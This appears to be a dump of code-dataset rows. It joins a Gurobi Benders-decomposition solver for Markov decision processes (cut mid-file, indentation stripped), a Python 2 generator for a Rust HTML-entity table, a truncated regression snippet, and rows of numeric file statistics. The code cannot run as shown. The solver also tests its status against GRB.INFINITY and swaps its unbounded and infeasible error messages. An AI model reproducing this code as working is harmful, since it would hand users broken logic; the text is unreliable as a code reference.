# model.setParam("IntFeasTol", 1e-9)
# the model pay the highest attention to numeric coherency.
model.setParam("NumericFocus", 3)
model.setParam("DualReductions", 0)
# ----------------------- Variables -------------------------
# policy, pr
var_y = {}
for a in self.action_dict.keys():
var_y[a] = model.addVar(
lb=0, ub=grb.GRB.INFINITY,
vtype=grb.GRB.CONTINUOUS,
name="y_{}".format(a)
)
model.update()
# objective
objective = grb.quicksum([
grb.quicksum([
self.reward_mat[s, a],
grb.quicksum([
self.gamma * self.trans_mat[a][
s, s_new
] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
]) * var_y[a]
for a in self.action_dict.keys()
])
model.setObjective(objective, grb.GRB.MAXIMIZE)
# ---------------------- Constraints ------------------------
# the only constraint
model.addLConstr(
lhs=grb.quicksum([
var_y[a]
for a in self.action_dict.keys()
]),
sense=grb.GRB.EQUAL,
rhs=1
)
model.update()
return model
def __modify_MDP_dual(self, s, theta_val):
"""
dual of MDP, single state
`s`: key of current state
`theta_val`
"""
# find variables and modify value
for a in self.action_dict.keys():
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
# self.var_y[s, a].setAttr(
"Obj", np.sum([
self.reward_mat[s, a],
np.sum([
self.gamma * self.trans_mat[a][
s, s_new
] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
])
)
self.subproblems[s].update()
return
def MDP_decomposition(self, sol_dir='None', write_log=False):
"""
MDP Benders decomposition
`sol_dir`: str, directory to output solution, do not include file name.
`write_log`: bool, write solving data to log, defualt False.
"""
self.log = write_log
if self.log:
logging.basicConfig(
filename='{}.log'.format(self.name), filemode='w+',
format='%(levelname)s - %(message)s', level=logging.INFO
)
# solving time of all models
solve_time = 0
# total time of the algorithm
run_time = time.time()
# start iteration
iteration = 0
while True:
# solving first stage
temp_time = time.time()
self.MP.optimize()
solve_time = solve_time + (time.time() - temp_time)
# log
if self.log:
logging.info("=========================")
logging.info("Iteration: {}".format(iteration))
# check first stage feasibility
if self.MP.status == grb.GRB.INFINITY:
raise ValueError("First stage infeasible!")
return
elif self.MP.status == grb.GRB.OPTIMAL:
# register first stage variables
# theta
theta_val = {
s: self.MP.getVarByName(
"theta_{}".format(s)
).X
for s in self.state_dict.keys()
}
# log
if self.log:
logging.info("MP Objective: {}".format(self.MP.ObjVal))
logging.info("theta: {}".format(theta_val))
else:
raise ValueError(
"First stage optimality code {}.".format(self.MP.status)
)
return
# going through each scenario
value = {}
optimal = True
epsilon = 1e-5
for s in self.state_dict.keys():
# modify second stage dual
self.__modify_MDP_dual(s, theta_val)
# solve
temp_time = time.time()
self.subproblems[s].optimize()
solve_time = solve_time + (time.time() - temp_time)
# check status
if self.subproblems[s].status == grb.GRB.UNBOUNDED:
# feasibility cut?
raise ValueError("Second stage {} infeasible!".format(s))
elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
raise ValueError("Second stage {} unbounded!".format(s))
elif self.subproblems[s].status == grb.GRB.OPTIMAL:
# register solution
for a in self.action_dict.keys():
self.y_val[s, a] = self.subproblems[s].getVarByName(
"y_{}".format(a)
).X
# log
if self.log:
logging.info("-------------------------")
logging.info(
" State: {}".format(self.state_dict[s])
)
logging.info(" Objective: {}".format(
self.subproblems[s].ObjVal
))
# e
e = np.dot([
self.y_val[s, a]
for a in self.action_dict.keys()
], [
self.reward_mat[s, a]
for a in self.action_dict.keys()
]
)
# coeff
coeff = {}
for s_new in self.state_dict.keys():
coeff[s_new] = (-1) * self.gamma * np.sum([
self.y_val[s, a] * self.trans_mat[a][s, s_new]
for a in self.action_dict.keys()
])
# E
E = np.sum([
coeff[s_new] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
value[s] = e - E
# condition
if self.log:
logging.info("Optimality condition:")
logging.info(
" State {}, theta = {}, value = {}".format(
self.state_dict[s],
self.var_theta[s].X, value[s]
)
)
if any([
theta_val[s] >= value[s],
np.abs(theta_val[s] - value[s]) <= epsilon
]):
# optimal, continue
continue
else:
optimal = False
# add optimality cut
self.MP.addLConstr(
lhs=grb.quicksum([self.var_theta[s]]),
sense=grb.GRB.GREATER_EQUAL,
rhs=e - grb.quicksum([
coeff[s_new] * self.var_theta[s_new]
for s_new in self.state_dict.keys()
])
)
continue
# after checking all states
if optimal:
self.final_time = time.time() - self.start_time
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
if self.log:
logging.info("==============================")
logging.info("Final Objective: {}".format(self.MP.ObjVal))
# stop loop
break
else:
self.MP.update()
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
iteration += 1
continue
# ------------------------- Output --------------------------
run_time = time.time() - run_time
# extract policy
policy = {}
for s in self.state_dict.keys():
policy[self.state_dict[s]] = self.action_dict[np.argmax([
self.y_val[s, a]
for a in self.action_dict.keys()
])]
# gap
gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
# print solution to file
if sol_dir == "None":
pass
else:
file = open(
"{}/{}-MPMDP.txt".format(sol_dir, self.name), mode="w+"
)
file.write("==============================\n")
file.write(
"Total algorithm run time: {} seconds;\n".format(run_time)
)
file.write(
"Total model solving time: {} seconds;\n".format(solve_time)
)
# optimal value and gap
file.write("==============================\n")
file.write("Optimal Value:\n")
file.write("Total value: {};\n".format(self.MP.ObjVal))
file.write("Gap: {};\n".format(gap))
for s in self.state_dict.keys():
file.write("{}: {}\n".format(self.state_dict[s], value[s]))
# optimal policy
file.write("==============================\n")
file.write("Optimal policy:\n")
for state in self.state_dict.values():
file.write("{}: {}\n".format(state, policy[state]))
file.write("==============================\n")
file.close()
return self.MP.ObjVal, gap, run_time, solve_time, policy
def __modify_MDP_dual_monotone(self, s, theta_val, best_action_ind):
"""
dual of MDP, single state
`s`: key of current state
`theta_val`
"""
# find variables and modify value
for a in self.action_dict.keys():
if a < best_action_ind:
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
"UB", 0
)
else:
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
"UB", grb.GRB.INFINITY
)
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
"Obj", np.sum([
self.reward_mat[s, a],
np.sum([
self.gamma * self.trans_mat[a][
s, s_new
] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
])
)
self.subproblems[s].update()
return
def MDP_decomposition_monotone(self, sol_dir='None', write_log=False):
"""
MDP Benders decomposition with monotone policy
`sol_dir`: str, directory to output solution, do not include file name.
`write_log`: bool, write solving data to log, defualt False.
"""
self.log = write_log
if self.log:
logging.basicConfig(
filename='{}.log'.format(self.name), filemode='w+',
format='%(levelname)s - %(message)s', level=logging.INFO
)
# solving time of all models
solve_time = 0
# total time of the algorithm
run_time = time.time()
# start iteration
iteration = 0
while True:
# solving first stage
temp_time = time.time()
self.MP.optimize()
solve_time = solve_time + (time.time() - temp_time)
# log
if self.log:
logging.info("=========================")
logging.info("Iteration: {}".format(iteration))
# check first stage feasibility
if self.MP.status == grb.GRB.INFINITY:
raise ValueError("First stage infeasible!")
elif self.MP.status == grb.GRB.OPTIMAL:
# register first stage variables
# theta
theta_val = {
s: self.MP.getVarByName(
"theta_{}".format(s)
).X
for s in self.state_dict.keys()
}
# log
if self.log:
logging.info("MP Objective: {}".format(self.MP.ObjVal))
logging.info("theta: {}".format(theta_val))
else:
raise ValueError(
"First stage optimality code {}.".format(self.MP.status)
)
# going through each scenario
value = {}
optimal = True
epsilon = 1e-5
best_action_ind = 0
for s in self.state_dict.keys():
# modify second stage dual
self.__modify_MDP_dual_monotone(s, theta_val, best_action_ind)
# solve
temp_time = time.time()
self.subproblems[s].optimize()
solve_time = solve_time + (time.time() - temp_time)
# check status
if self.subproblems[s].status == grb.GRB.UNBOUNDED:
# feasibility cut?
raise ValueError("Second stage {} infeasible!".format(s))
elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
raise ValueError("Second stage {} unbounded!".format(s))
elif self.subproblems[s].status == grb.GRB.OPTIMAL:
# register solution
for a in self.action_dict.keys():
self.y_val[s, a] = self.subproblems[s].getVarByName(
"y_{}".format(a)
).X
best_action_ind = np.argmax([
self.y_val[s, a] for a in self.action_dict.keys()
])
# log
if self.log:
logging.info("-------------------------")
logging.info(
" State: {}".format(self.state_dict[s])
)
logging.info(" Objective: {}".format(
self.subproblems[s].ObjVal
))
# e
e = np.dot([
self.y_val[s, a]
for a in self.action_dict.keys()
], [
self.reward_mat[s, a]
for a in self.action_dict.keys()
]
)
# coeff
coeff = {}
for s_new in self.state_dict.keys():
coeff[s_new] = (-1) * self.gamma * np.sum([
self.y_val[s, a] * self.trans_mat[a][s, s_new]
for a in self.action_dict.keys()
])
# E
E = np.sum([
coeff[s_new] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
value[s] = e - E
# condition
if self.log:
logging.info("Optimality condition:")
logging.info(
" State {}, theta = {}, value = {}".format(
self.state_dict[s],
self.var_theta[s].X, value[s]
)
)
if any([
theta_val[s] >= value[s],
np.abs(theta_val[s] - value[s]) <= epsilon
]):
# optimal, continue
continue
else:
optimal = False
# add optimality cut
self.MP.addLConstr(
lhs=grb.quicksum([self.var_theta[s]]),
sense=grb.GRB.GREATER_EQUAL,
rhs=e - grb.quicksum([
coeff[s_new] * self.var_theta[s_new]
for s_new in self.state_dict.keys()
])
)
continue
# after checking all states
if optimal:
self.final_time = time.time() - self.start_time
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
if self.log:
logging.info("==============================")
logging.info("Final Objective: {}".format(self.MP.ObjVal))
# stop loop
break
else:
self.MP.update()
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
iteration += 1
continue
# ------------------------- Output --------------------------
run_time = time.time() - run_time
# extract policy
policy = {}
for s in self.state_dict.keys():
policy[self.state_dict[s]] = self.action_dict[np.argmax([
self.y_val[s, a]
for a in self.action_dict.keys()
])]
# gap
gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
# print solution to file
if sol_dir == "None":
pass
else:
file = open(
"{}/{}-MPMDP_mono.txt".format(sol_dir, self.name), mode="w+"
)
file.write("==============================\n")
file.write(
"Total algorithm run time: {} seconds;\n".format(run_time)
)
file.write(
"Total model solving time: {} seconds;\n".format(solve_time)
)
# optimal value and gap
file.write("==============================\n")
file.write("Optimal Value:\n")
file.write("Total value: {};\n".format(self.MP.ObjVal))
file.write("Gap: {};\n".format(gap))
for s in self.state_dict.keys():
file.write("{}: {}\n".format(self.state_dict[s], value[s]))
# optimal policy
file.write("==============================\n")
file.write("Optimal policy:\n")
for state in self.state_dict.values():
file.write("{}: {}\n".format(state, policy[state]))
file.write("==============================\n")
file.close()
return self.MP.ObjVal, gap, run_time, solve_time, policy
class Constrained_MDP_Benders:
"""
Benders Decomposition of Markov Decision Processes.
"""
def __init__(
self, name, MP, states, actions, trans_mat, reward_mat, gamma,
d, D
):
"""
`name`
`MP`
`MDP`
Note that in this CLASS, s and a are indices.
"""
super().__init__()
self.start_time = time.time()
self.final_time = "nan"
self.name = name
self.MP = MP
self.state_dict = {
s: states[s] for s in range(len(states))
}
self.action_dict = {
a: actions[a] for a in range(len(actions))
}
self.trans_mat = trans_mat
self.reward_mat = reward_mat
self.gamma = gamma
self.d, self.D = d, D
self.var_theta = {
s: self.MP.getVarByName("theta_{}".format(s))
for s in self.state_dict.keys()
}
self.var_rho = {
i: self.MP.getVarByName("rho_{}".format(i))
for i in range(len(self.D))
}
self.var_vu = {}
# ------------------------------------------------------
# constructing all subproblems first
self.subproblems, self.y_val = {}, {}
for s in self.state_dict.keys():
self.subproblems[s] = self.__build_MDP_dual(s, theta_val={
s: -1e10
for s in self.state_dict.keys()
}, rho_val={
i: 0
for i in range(len(self.D))
})
# ------------------------------------------------------
self.log = False
def __build_MDP_dual(self, s, theta_val, rho_val):
"""
dual of MDP, single state
`s`: key of current state
`theta_val`
"""
# Gurobi model
model = grb.Model()
model.setParam("OutputFlag", False)
# model.setParam("IntFeasTol", 1e-9)
# the model pay the highest attention to numeric coherency.
model.setParam("NumericFocus", 3)
model.setParam("DualReductions", 0)
# ----------------------- Variables -------------------------
# policy, pr
var_y = {}
for a in self.action_dict.keys():
var_y[a] = model.addVar(
lb=0, ub=grb.GRB.INFINITY,
vtype=grb.GRB.CONTINUOUS,
name="y_{}".format(a)
)
model.update()
# objective
objective = grb.quicksum([
grb.quicksum([
self.reward_mat[s, a],
grb.quicksum([
self.gamma * self.trans_mat[a][
s, s_new
] * theta_val[s_new]
for s_new in self.state_dict.keys()
]),
(-1) * grb.quicksum([
self.d[i, s, a] * rho_val[i]
for i in range(len(self.D))
])
]) * var_y[a]
for a in self.action_dict.keys()
])
model.setObjective(objective, grb.GRB.MAXIMIZE)
# ---------------------- Constraints ------------------------
# the only constraint
model.addLConstr(
lhs=grb.quicksum([
var_y[a]
for a in self.action_dict.keys()
]),
sense=grb.GRB.EQUAL,
rhs=1
)
model.update()
return model
def __modify_MDP_dual(self, s, theta_val, rho_val):
"""
dual of MDP, single state
`s`: key of current state
`theta_val`
"""
# find variables and modify value
for a in self.action_dict.keys():
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
# self.var_y[s, a].setAttr(
"Obj", np.sum([
self.reward_mat[s, a],
np.sum([
self.gamma * self.trans_mat[a][
s, s_new
] * theta_val[s_new]
for s_new in self.state_dict.keys()
]),
(-1) * np.sum([
self.d[i, s, a] * rho_val[i]
for i in range(len(self.D))
])
])
)
self.subproblems[s].update()
return
def MDP_decomposition(self, sol_dir='None', write_log=False):
"""
MDP Benders decomposition
`sol_dir`: str, directory to output solution, do not include file name.
`write_log`: bool, write solving data to log, defualt False.
"""
self.log = write_log
if self.log:
logging.basicConfig(
filename='{}.log'.format(self.name), filemode='w+',
format='%(levelname)s - %(message)s', level=logging.INFO
)
# solving time of all models
solve_time = 0
# total time of the algorithm
run_time = time.time()
# start iteration
iteration = 0
while True:
# solving first stage
temp_time = time.time()
self.MP.optimize()
solve_time = solve_time + (time.time() - temp_time)
# log
if self.log:
logging.info("=========================")
logging.info("Iteration: {}".format(iteration))
# check first stage feasibility
if self.MP.status == grb.GRB.INFINITY:
raise ValueError("First stage infeasible!")
return
elif self.MP.status == grb.GRB.OPTIMAL:
# register first stage variables
# theta
theta_val = {
s: self.MP.getVarByName(
"theta_{}".format(s)
).X
for s in self.state_dict.keys()
}
# rho
rho_val = {
i: self.MP.getVarByName(
"rho_{}".format(i)
).X
for i in range(len(self.D))
}
# log
if self.log:
logging.info("MP Objective: {}".format(self.MP.ObjVal))
logging.info("theta: {}".format(theta_val))
logging.info("rho: {}".format(rho_val))
else:
raise ValueError(
"First stage optimality code {}.".format(self.MP.status)
)
return
# going through each scenario
value = {}
optimal = True
epsilon = 1e-5
for s in self.state_dict.keys():
# modify second stage dual
self.__modify_MDP_dual(s, theta_val, rho_val)
# solve
temp_time = time.time()
self.subproblems[s].optimize()
solve_time = solve_time + (time.time() - temp_time)
# check status
if self.subproblems[s].status == grb.GRB.UNBOUNDED:
# feasibility cut?
raise ValueError("Second stage {} infeasible!".format(s))
elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
raise ValueError("Second stage {} unbounded!".format(s))
elif self.subproblems[s].status == grb.GRB.OPTIMAL:
# register solution
for a in self.action_dict.keys():
self.y_val[s, a] = self.subproblems[s].getVarByName(
"y_{}".format(a)
).X
# log
if self.log:
logging.info("-------------------------")
logging.info(
" State: {}".format(self.state_dict[s])
)
logging.info(" Objective: {}".format(
self.subproblems[s].ObjVal
))
# e
e = np.dot([
self.y_val[s, a]
for a in self.action_dict.keys()
], [
self.reward_mat[s, a]
for a in self.action_dict.keys()
]
)
# coeff
coeff, coeff_d = {}, {}
for s_new in self.state_dict.keys():
coeff[s_new] = (-1) * self.gamma * np.sum([
self.y_val[s, a] * self.trans_mat[a][s, s_new]
for a in self.action_dict.keys()
])
for i in range(len(self.D)):
coeff_d[i] = np.sum([
self.y_val[s, a] * self.d[i, s, a]
for a in self.action_dict.keys()
])
# E
E = np.sum([
np.sum([
coeff[s_new] * theta_val[s_new]
for s_new in self.state_dict.keys()
]),
np.sum([
coeff_d[i] * rho_val[i]
for i in range(len(self.D))
])
])
value[s] = e - E
# condition
if self.log:
logging.info("Optimality condition:")
logging.info(
" State {}, theta = {}, value = {}".format(
self.state_dict[s],
self.var_theta[s].X, value[s]
)
)
if any([
theta_val[s] >= value[s],
np.abs(theta_val[s] - value[s]) <= epsilon
]):
# optimal, continue
continue
else:
optimal = False
# add optimality cut
self.MP.addLConstr(
lhs=grb.quicksum([self.var_theta[s]]),
sense=grb.GRB.GREATER_EQUAL,
rhs=e - grb.quicksum([
grb.quicksum([
coeff[s_new] * self.var_theta[s_new]
for s_new in self.state_dict.keys()
]),
grb.quicksum([
coeff_d[i] * self.var_rho[i]
for i in range(len(self.D))
]),
])
)
continue
# after checking all states
if optimal:
self.final_time = time.time() - self.start_time
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
if self.log:
logging.info("==============================")
logging.info("Final Objective: {}".format(self.MP.ObjVal))
# stop loop
break
else:
self.MP.update()
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
iteration += 1
continue
# ------------------------- Output --------------------------
run_time = time.time() - run_time
# extract policy
policy = {}
for s in self.state_dict.keys():
policy[self.state_dict[s]] = self.action_dict[np.argmax([
self.y_val[s, a]
for a in self.action_dict.keys()
])]
# gap
gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
# print solution to file
if sol_dir == "None":
pass
else:
file = open(
"{}/{}-MPMDP.txt".format(sol_dir, self.name), mode="w+"
)
file.write("==============================\n")
file.write(
"Total algorithm run time: {} seconds;\n".format(run_time)
)
file.write(
"Total model solving time: {} seconds;\n".format(solve_time)
)
# optimal value and gap
file.write("==============================\n")
file.write("Optimal Value:\n")
file.write("Total value: {};\n".format(self.MP.ObjVal))
file.write("Gap: {};\n".format(gap))
for s in self.state_dict.keys():
file.write("{}: {}\n".format(self.state_dict[s], value[s]))
# optimal policy
file.write("==============================\n")
file.write("Optimal policy:\n")
for state in self.state_dict.values():
file.write("{}: {}\n".format(state, policy[state]))
file.write("==============================\n")
file.close()
return self.MP.ObjVal, gap, run_time, solve_time, policy
def __modify_MDP_dual_monotone(self, s, theta_val, best_action_ind):
"""
dual of MDP, single state
`s`: key of current state
`theta_val`
"""
# find variables and modify value
for a in self.action_dict.keys():
if a < best_action_ind:
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
"UB", 0
)
else:
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
"UB", grb.GRB.INFINITY
)
self.subproblems[s].getVarByName("y_{}".format(a)).setAttr(
"Obj", np.sum([
self.reward_mat[s, a],
np.sum([
self.gamma * self.trans_mat[a][
s, s_new
] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
])
)
self.subproblems[s].update()
return
def MDP_decomposition_monotone(self, sol_dir='None', write_log=False):
"""
MDP Benders decomposition with monotone policy
`sol_dir`: str, directory to output solution, do not include file name.
`write_log`: bool, write solving data to log, defualt False.
"""
self.log = write_log
if self.log:
logging.basicConfig(
filename='{}.log'.format(self.name), filemode='w+',
format='%(levelname)s - %(message)s', level=logging.INFO
)
# solving time of all models
solve_time = 0
# total time of the algorithm
run_time = time.time()
# start iteration
iteration = 0
while True:
# solving first stage
temp_time = time.time()
self.MP.optimize()
solve_time = solve_time + (time.time() - temp_time)
# log
if self.log:
logging.info("=========================")
logging.info("Iteration: {}".format(iteration))
# check first stage feasibility
if self.MP.status == grb.GRB.INFINITY:
raise ValueError("First stage infeasible!")
elif self.MP.status == grb.GRB.OPTIMAL:
# register first stage variables
# theta
theta_val = {
s: self.MP.getVarByName(
"theta_{}".format(s)
).X
for s in self.state_dict.keys()
}
# log
if self.log:
logging.info("MP Objective: {}".format(self.MP.ObjVal))
logging.info("theta: {}".format(theta_val))
else:
raise ValueError(
"First stage optimality code {}.".format(self.MP.status)
)
# going through each scenario
value = {}
optimal = True
epsilon = 1e-5
best_action_ind = 0
for s in self.state_dict.keys():
# modify second stage dual
self.__modify_MDP_dual_monotone(s, theta_val, best_action_ind)
# solve
temp_time = time.time()
self.subproblems[s].optimize()
solve_time = solve_time + (time.time() - temp_time)
# check status
if self.subproblems[s].status == grb.GRB.UNBOUNDED:
# feasibility cut?
raise ValueError("Second stage {} infeasible!".format(s))
elif self.subproblems[s].status == grb.GRB.INFEASIBLE:
raise ValueError("Second stage {} unbounded!".format(s))
elif self.subproblems[s].status == grb.GRB.OPTIMAL:
# register solution
for a in self.action_dict.keys():
self.y_val[s, a] = self.subproblems[s].getVarByName(
"y_{}".format(a)
).X
best_action_ind = np.argmax([
self.y_val[s, a] for a in self.action_dict.keys()
])
# log
if self.log:
logging.info("-------------------------")
logging.info(
" State: {}".format(self.state_dict[s])
)
logging.info(" Objective: {}".format(
self.subproblems[s].ObjVal
))
# e
e = np.dot([
self.y_val[s, a]
for a in self.action_dict.keys()
], [
self.reward_mat[s, a]
for a in self.action_dict.keys()
]
)
# coeff
coeff = {}
for s_new in self.state_dict.keys():
coeff[s_new] = (-1) * self.gamma * np.sum([
self.y_val[s, a] * self.trans_mat[a][s, s_new]
for a in self.action_dict.keys()
])
# E
E = np.sum([
coeff[s_new] * theta_val[s_new]
for s_new in self.state_dict.keys()
])
value[s] = e - E
# condition
if self.log:
logging.info("Optimality condition:")
logging.info(
" State {}, theta = {}, value = {}".format(
self.state_dict[s],
self.var_theta[s].X, value[s]
)
)
if any([
theta_val[s] >= value[s],
np.abs(theta_val[s] - value[s]) <= epsilon
]):
# optimal, continue
continue
else:
optimal = False
# add optimality cut
self.MP.addLConstr(
lhs=grb.quicksum([self.var_theta[s]]),
sense=grb.GRB.GREATER_EQUAL,
rhs=e - grb.quicksum([
coeff[s_new] * self.var_theta[s_new]
for s_new in self.state_dict.keys()
])
)
continue
# after checking all states
if optimal:
self.final_time = time.time() - self.start_time
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
if self.log:
logging.info("==============================")
logging.info("Final Objective: {}".format(self.MP.ObjVal))
# stop loop
break
else:
self.MP.update()
# self.MP.write("model/{}-MPMDP.lp".format(self.name))
iteration += 1
continue
# ------------------------- Output --------------------------
run_time = time.time() - run_time
# extract policy
policy = {}
for s in self.state_dict.keys():
policy[self.state_dict[s]] = self.action_dict[np.argmax([
self.y_val[s, a]
for a in self.action_dict.keys()
])]
# gap
gap = 0 if self.MP.IsMIP == 0 else self.MP.MIPGap
# print solution to file
if sol_dir == "None":
pass
else:
file = open(
"{}/{}-MPMDP_mono.txt".format(sol_dir, self.name), mode="w+"
)
file.write("==============================\n")
file.write(
"Total algorithm run time: {} seconds;\n".format(run_time)
)
file.write(
"Total model solving time: {} seconds;\n".format(solve_time)
)
# optimal value and gap
file.write("==============================\n")
file.write("Optimal Value:\n")
file.write("Total value: {};\n".format(self.MP.ObjVal))
file.write("Gap: {};\n".format(gap))
for s in self.state_dict.keys():
file.write("{}: {}\n".format(self.state_dict[s], value[s]))
# optimal policy
file.write("==============================\n")
file.write("Optimal policy:\n")
for state in self.state_dict.values():
file.write("{}: {}\n".format(state, policy[state]))
file.write("==============================\n")
file.close()
return self.MP.ObjVal, gap, run_time, solve_time, policy
| 39.757798
| 79
| 0.410052
| 4,146
| 43,336
| 4.160154
| 0.051375
| 0.026786
| 0.04673
| 0.038265
| 0.986143
| 0.985853
| 0.985853
| 0.980346
| 0.976635
| 0.975359
| 0
| 0.002406
| 0.453226
| 43,336
| 1,089
| 80
| 39.794307
| 0.725512
| 0.111062
| 0
| 0.881657
| 0
| 0
| 0.077344
| 0.021985
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014201
| false
| 0.004734
| 0.004734
| 0
| 0.03787
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62d656c88785129e29ef0e5775a6ea022f20caba
| 3,188
|
py
|
Python
|
tools/mk_entities.py
|
waywardmonkeys/pulldown-cmark
|
07863e9e54cfcb108693ca1ab64967b5ad7bd952
|
[
"MIT"
] | 9
|
2020-10-11T13:38:55.000Z
|
2021-12-28T16:17:48.000Z
|
tools/mk_entities.py
|
waywardmonkeys/pulldown-cmark
|
07863e9e54cfcb108693ca1ab64967b5ad7bd952
|
[
"MIT"
] | 2
|
2020-10-28T21:28:48.000Z
|
2020-10-29T15:53:34.000Z
|
tools/mk_entities.py
|
waywardmonkeys/pulldown-cmark
|
07863e9e54cfcb108693ca1ab64967b5ad7bd952
|
[
"MIT"
] | 7
|
2020-10-26T02:16:34.000Z
|
2022-01-27T19:44:04.000Z
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# get https://html.spec.whatwg.org/multipage/entities.json
# Usage: python tools/mk_entities.py entities.json > src/entities.rs
import json
import sys
def main(args):
jsondata = json.loads(file(args[1]).read())
entities = [entity[1:-1] for entity in jsondata.keys() if entity.endswith(';')]
entities.sort()
print """// Copyright 2015 Google Inc. All rights reserved.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//! Expansions of HTML5 entities
// Autogenerated by mk_entities.py
const ENTITIES: [&'static str; %i] = [""" % len(entities)
for e in entities:
print " \"" + e + "\","
print """ ];
const ENTITY_VALUES: [&'static str; %i] = [""" % len(entities)
for e in entities:
codepoints = jsondata['&' + e + ';']["codepoints"];
s = ''.join(['\u{%04X}' % cp for cp in codepoints])
print " \"" + s + "\","
print """ ];
pub fn get_entity(name: &str) -> Option<&'static str> {
ENTITIES.binary_search(&name).ok().map(|i| ENTITY_VALUES[i])
}
"""
main(sys.argv)
| 44.277778
| 83
| 0.717691
| 462
| 3,188
| 4.939394
| 0.331169
| 0.077125
| 0.022787
| 0.019281
| 0.788782
| 0.788782
| 0.788782
| 0.788782
| 0.788782
| 0.758107
| 0
| 0.00538
| 0.183814
| 3,188
| 72
| 84
| 44.277778
| 0.871637
| 0.373902
| 0
| 0.166667
| 0
| 0
| 0.745316
| 0.021266
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.047619
| null | null | 0.119048
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62f32423ab8980f8f59617263d230752dc436e27
| 1,977
|
py
|
Python
|
otools/estimate_db.py
|
filipp-g/magneto
|
06be4badd37d412be094e917bb44b8ab15ae79b6
|
[
"MIT"
] | null | null | null |
otools/estimate_db.py
|
filipp-g/magneto
|
06be4badd37d412be094e917bb44b8ab15ae79b6
|
[
"MIT"
] | 6
|
2019-10-20T17:11:40.000Z
|
2019-10-20T17:13:13.000Z
|
otools/estimate_db.py
|
filipp-g/magneto
|
06be4badd37d412be094e917bb44b8ab15ae79b6
|
[
"MIT"
] | 1
|
2019-10-19T01:52:20.000Z
|
2019-10-19T01:52:20.000Z
|
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
def estimate_by_station(i, j, raw_station_data):
y=np.transpose(np.array(raw_station_data[i, :]))
x=np.array(range(1, len(y)+1))
b=np.array(np.ones(len(x)))
X=np.transpose(np.matrix([x, b]))
poly2=PolynomialFeatures(degree=3)
X_poly=poly2.fit_transform(X)
poly2.fit(X_poly, y)
lin2=LinearRegression()
lin2.fit(X_poly, y)
return lin2.predict(poly2.fit_transform(np.matrix([(j+1), 1])))
def get_extremes_for_station(i, raw_station_data):
extremes=[]
y=np.transpose(np.array(raw_station_data[i, :]))
x=np.array(range(1, len(y)+1))
b=np.array(np.ones(len(x)))
